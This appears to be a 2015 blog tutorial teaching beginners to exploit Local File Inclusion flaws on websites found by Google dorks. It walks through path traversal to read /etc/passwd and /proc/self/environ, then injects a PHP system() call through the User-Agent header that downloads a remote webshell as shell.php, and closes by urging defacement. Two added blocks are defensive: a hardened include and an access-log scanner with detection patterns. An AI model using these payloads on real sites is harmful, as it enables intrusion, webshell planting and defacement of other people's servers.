Wednesday 20 May 2015

Hacking LFI vuln Websites 2015

Beginner_tutorial



LFI stands for Local File Inclusion.
LFI is a common website vulnerability, seen on many websites, like SQL injection.
It allows you to include your shell or malicious code on the target web server.

THERE ARE 6 PARTS TO THIS TUTORIAL:


1 Introduction
2 Finding LFI VULN. WEBSITE
3 Checking if etc/passwd is accessible
4 Checking if proc/self/environ is accessible
5 Injecting malicious code (shell.php)
6 Accessing our shell


LET'S BEGIN....

1) Introduction

In this tutorial I show you how to upload a webshell to websites using Local File Inclusion vulnerabilities and
by injecting malicious code into proc/self/environ.

Local File Inclusion (LFI) is similar to a Remote File Inclusion vulnerability except instead of including remote files, only local files i.e. files on the current server can be included. The vulnerability is also due to the use of user-supplied input without proper validation.

It is a step-by-step tutorial.


2) Finding LFI

YOU CAN USE A GOOD GOOGLE DORK TO FIND LFI VULNERABLE WEBSITES.
YOU CAN FIND MANY WEBSITES, BUT NOT ALL OF THEM ARE LFI VULNERABLE... SO DON'T BE ANGRY, BE COOL.

- Now we are going to find a Local File Inclusion vulnerable website. So we found our target, let's check it.



FOR EXAMPLE, I FIND A WEBSITE LIKE THIS:

www.example.com/view.php?page=contact.php

NOW WE ARE GOING TO CHECK WHETHER IT IS LFI VULNERABLE OR NOT. FOR THAT WE REPLACE contact.php WITH ../ SO THE URL BECOMES

www.example.com/view.php?page=../

AND WE GOT AN ERROR

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337


IF YOU GET AN ERROR, THEN IT IS LFI VULNERABLE. IF YOU DO NOT GET AN ERROR, OR IF YOU GET A BLANK PAGE, THEN IT'S NOT LFI VULNERABLE.
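
The `view.php?page=` include above is the "user-supplied input without proper validation" from section 1. As an added example (not code from the original page; the `pages/` layout, the page names and `resolve_page()` are assumptions), here is the vulnerable pattern beside a hardened form that also keeps the path-revealing warning out of the response:

```php
<?php
// Added example: a hypothetical view.php, not code from the original page.

// Vulnerable pattern: the request parameter reaches include() unchanged,
// so "../" sequences can walk out of the site's own directory.
//     include($_GET['page']);

// The warning quoted above exposes the server path; log errors instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

const PAGES_DIR = __DIR__ . '/pages';   // assumed layout
const PAGES = [                         // assumed page names -> fixed files
    'home'    => 'home.php',
    'contact' => 'contact.php',
];

function resolve_page($name, string $baseDir = PAGES_DIR, array $pages = PAGES): ?string
{
    // Allowlist: anything that is not a known page name never touches the filesystem.
    if (!is_string($name) || !array_key_exists($name, $pages)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $pages[$name]);
    if ($base === false || $path === false) {
        return null;
    }
    // Defence in depth: a symlink or bad table entry must not escape $base.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$target = resolve_page($_GET['page'] ?? 'home');
if ($target === null) {
    http_response_code(404);
    exit('Page not found');
}
include $target;
```

The URL then carries `?page=contact` rather than a file name, and `page=../../../etc/passwd` gets the same 404 as any other unknown page.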


3) Checking if etc/passwd is accessible

Now let's check for etc/passwd to see if the site is Local File Inclusion vulnerable. Let's make a request:

www.example.com/view.php?page=../../../etc/passwd


We got an error and no etc/passwd file:

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337


SO WE GO UP MORE DIRECTORIES:

www.example.com/view.php?page=../../../../../etc/passwd


We successfully included the etc/passwd file:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
test:x:13:30:test:/var/test:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin


THERE ARE ALSO GOOD DIRECTORIES THAT YOU CAN VISIT:

/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default


4) Checking if proc/self/environ is accessible

- Now let's see if proc/self/environ is accessible. We replace etc/passwd with proc/self/environ:

www.example.com/view.php?page=../../../../../proc/self/environ


IF YOU GET SOMETHING LIKE THIS

DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=../../../../../../proc/self/environ REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=../../../../../../proc/self/environ SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.example.com Port 80



Then proc/self/environ is accessible. If you get a blank page or an error, proc/self/environ is not accessible or the OS is FreeBSD.

5) Injecting malicious code

- Now let's inject our malicious code into proc/self/environ. How can we do that? We can inject our code in the User-Agent HTTP header.
Use the Tamper Data add-on for Firefox to change the User-Agent. Start Tamper Data in Firefox and request the URL:

www.example.com/view.php?page=../../../../../proc/self/environ

TAMPER DATA IS AN ADD-ON FOR MOZILLA FIREFOX. JUST GOOGLE IT AND YOU WILL FIND IT. Choose Tamper Data and, in User-Agent, write the following code:

<?system('wget http://www.example-remoteshell.com/shell.txt -O shell.php');?>

("NOTE: USE A REMOTE WEBSITE WHICH PROVIDES A SHELL, OR USE YOUR OWN LOCAL SERVER, FOR THE wget URL")

Our command will be executed through system() (it will download the txt shell from http://www.zer0w0rm.com/Shells/gny.txt and save it as shell.php in the
website directory), and our shell will be created.
If it doesn't work, try exec(), because system() can be disabled on the web server in php.ini.

HERE "http://www.example-remoteshell.com/shell.txt" IS THE LOCATION OF YOUR SHELL, WHICH YOU HAVE TO PUT IN A TXT FILE.

IT IS NOT NECESSARY TO UPLOAD YOUR SHELL TO DRIVE HQ.

WHAT THIS CODE DOES IS UPLOAD YOUR TXT FILE TO THE LFI VULNERABLE WEBSITE AS shell.php
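
How the requests in sections 3 to 5 appear in the web server's access log, as an added example that is not part of the original post: a small scanner that flags traversal sequences, the file names used above, and PHP open tags in the User-Agent. The Apache "combined" log format, the sample lines and `classify_request()` are constructed for illustration.

```php
<?php
// Added example: flags access-log lines shaped like the requests in sections 3-5.
// The log lines are constructed; Apache "combined" format is an assumption.

function classify_request(string $line): array
{
    // ... "METHOD URI PROTO" status bytes "referer" "user-agent"
    if (!preg_match('/"[A-Z]+ (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "(.*)"$/', $line, $m)) {
        return ['unparsed'];
    }
    [, $uri, $status, $agent] = $m;
    $query = explode('?', $uri, 2)[1] ?? '';
    // Decode twice so %2e%2e%2f and %252e%252e%252f both become "../".
    $decoded = rawurldecode(rawurldecode($query));

    $findings = [];
    if (preg_match('#\.\.[/\\\\]#', $decoded)) {
        $findings[] = 'traversal';
    }
    if (preg_match('#etc/(passwd|shadow|group|security/)|proc/self/environ#', $decoded)) {
        $findings[] = 'sensitive-file';
    }
    // Browsers do not send PHP open tags in User-Agent.
    if (strpos($agent, '<?') !== false) {
        $findings[] = 'php-in-user-agent';
    }
    // A 200 on a flagged request deserves a look at what was returned.
    if ($findings && $status === '200') {
        $findings[] = 'served-200';
    }
    return $findings;
}

// Constructed sample lines (documentation IP range).
$sample = <<<'LOG'
192.0.2.10 - - [20/May/2015:10:00:01 +0000] "GET /view.php?page=contact.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.44 - - [20/May/2015:10:00:05 +0000] "GET /view.php?page=../../../../../etc/passwd HTTP/1.1" 200 1300 "-" "Mozilla/5.0"
192.0.2.44 - - [20/May/2015:10:00:09 +0000] "GET /view.php?page=..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 900 "-" "<?php echo 1; ?>"
LOG;

foreach (explode("\n", $sample) as $line) {
    echo (implode(',', classify_request($line)) ?: 'clean'), "\n";
}
```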


6) Access our shell

- Now let's check if our malicious code was successfully injected. Let's check if the shell is present.


www.example.com/shell.php

OUR SHELL IS THERE, INJECTION IS SUCCESSFUL.... :D

NOW DEFACE (Y)
